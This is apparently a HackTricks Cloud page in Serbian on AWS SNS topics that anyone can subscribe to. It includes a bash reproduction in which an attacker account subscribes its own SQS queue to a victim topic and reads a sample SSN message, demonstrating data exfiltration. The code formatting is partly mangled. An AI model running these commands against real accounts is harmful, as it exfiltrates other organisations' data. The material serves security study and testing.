HackTricks CloudAWS - SNS Unauthenticated Enum
Tip
Nauči & vežbaj AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Pogledajte subscription plans!
- Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.
- Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.
SNS
Za više informacija o SNS pogledajte:
Otvoreno za sve
Kada konfigurišete SNS topic iz web konzole moguće je označiti da Everyone can publish and subscribe na topic:
.png)
Dakle, ako pronađete ARN of topics unutar naloga (ili brute forcing potencijalnih imena for topics) možete proveriti da li možete publish ili subscribe na njih.
To bi bilo ekvivalentno SNS topic resource policy koja dozvoljava sns:Subscribe za * (ili za external accounts), bilo koji principal može kreirati subscription koji isporučuje sve buduće poruke topic-a u SQS queue koji poseduje. Kada vlasnik queue-a inicira subscription, nije potrebna ljudska potvrda za SQS endpoints.
Repro (us-east-1)
```bash REGION=us-east-1 # Victim account (topic owner) VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON {“Version”:“2012-10-17”,“Statement”:[{“Sid”:“OpenSubscribe”,“Effect”:“Allow”,“Principal”:“*”,“Action”:“sns:Subscribe”,“Resource”:“$VICTIM_TOPIC_ARN”}]} JSON aws sns set-topic-attributes –region $REGION –topic-arn “$VICTIM_TOPIC_ARN” –attribute-name Policy –attribute-value file:///tmp/topic-policy.json
Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue –queue-name attacker-exfil-queue-$(date +%s) –region $REGION –query QueueUrl –output text) ATTACKER_Q_ARN=$(aws sqs get-queue-attributes –queue-url “$ATTACKER_Q_URL” –region $REGION –attribute-names QueueArn –query Attributes.QueueArn –output text)
Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON {“Version”:“2012-10-17”,“Statement”:[{“Sid”:“AllowVictimTopicSend”,“Effect”:“Allow”,“Principal”:{“Service”:“sns.amazonaws.com”},“Action”:“sqs:SendMessage”,“Resource”:“$ATTACKER_Q_ARN”,“Condition”:{“ArnEquals”:{“aws:SourceArn”:“$VICTIM_TOPIC_ARN”}}}]} JSON aws sqs set-queue-attributes –queue-url “$ATTACKER_Q_URL” –region $REGION –attributes Policy=“$(cat /tmp/sqs-policy.json)”
Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe –region $REGION –topic-arn “$VICTIM_TOPIC_ARN” –protocol sqs –notification-endpoint “$ATTACKER_Q_ARN” –query SubscriptionArn –output text)
Validation: publish and receive
aws sns publish –region $REGION –topic-arn “$VICTIM_TOPIC_ARN” –message {pii:ssn:123-45-6789} aws sqs receive-message –queue-url “$ATTACKER_Q_URL” –region $REGION –max-number-of-messages 1 –wait-time-seconds 10 –query Messages[0].Body –output text
</details>
> [!TIP]
> Nauči & vežbaj AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Nauči & vežbaj GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Nauči & vežbaj Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Podržite HackTricks</summary>
>
> - Pogledajte [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **pratite** nas na **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hacking tricks slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>